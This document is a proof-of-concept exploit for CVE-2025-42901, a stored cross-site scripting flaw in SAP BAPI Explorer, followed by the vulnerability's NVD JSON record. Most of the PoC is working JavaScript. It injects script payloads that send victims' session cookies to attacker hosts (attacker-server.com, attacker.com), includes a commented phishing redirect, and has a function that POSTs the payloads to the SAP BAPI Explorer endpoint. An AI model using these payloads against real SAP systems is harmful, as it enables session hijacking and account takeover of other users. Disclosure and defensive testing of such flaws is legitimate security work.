CVE-2025-42901

<!-- Stored XSS PoC for SAP BAPI Explorer (CVE-2025-42901) --> <!-- This PoC demonstrates how a malicious payload can be stored in BAPI Explorer --> <!-- Note: Requires valid authentication credentials to exploit --> // Step 1: Attacker injects malicious JavaScript payload into BAPI Explorer input field // The payload will be stored on the server and executed when victims view the affected page // Example malicious payload to inject into BAPI name or description field: var xssPayload = '<script>' + // Steal session cookies (if not HttpOnly protected) 'var img=new Image();' + 'img.src="http://attacker-server.com/steal?cookie="+encodeURIComponent(document.cookie);' + // Or redirect victim to phishing page // 'window.location="http://attacker-server.com/phishing";' + '</script>'; // Step 2: Submit the payload through BAPI Explorer interface // The payload gets stored in the backend without proper sanitization // Step 3: When victim user accesses BAPI Explorer and views the stored data, // the browser executes the malicious script automatically // PoC using fetch API to demonstrate the exploitation flow: function exploitBAPIExplorer(targetUrl, sessionCookie) { // Inject XSS payload into BAPI Explorer var payload = { bapi_name: '<script>fetch("http://attacker.com/log?data="+document.cookie)</script>', description: '<img src=x onerror="fetch(\'http://attacker.com/log?session=\'+document.cookie)">' }; // Send payload to BAPI Explorer endpoint fetch(targetUrl + '/sap/bc/bsp/sap/bapi_explorer/', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': sessionCookie }, body: new URLSearchParams(payload) }); // The payload is now stored and will execute when other users view the page } // Detection payload for testing: // '<script>alert("XSS-CVE-2025-42901")</script>'

{"cve": {"id": "CVE-2025-42901", "sourceIdentifier": "[email protected]", "published": "2025-10-14T01:15:31.733", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Application Server for ABAP allows an authenticated attacker to store malicious JavaScript payloads which could be executed in victim user's browser when accessing the affected functionality of BAPI explorer. This has low impact on confidentiality and integrity with no impact on availability of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://me.sap.com/notes/3652788", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}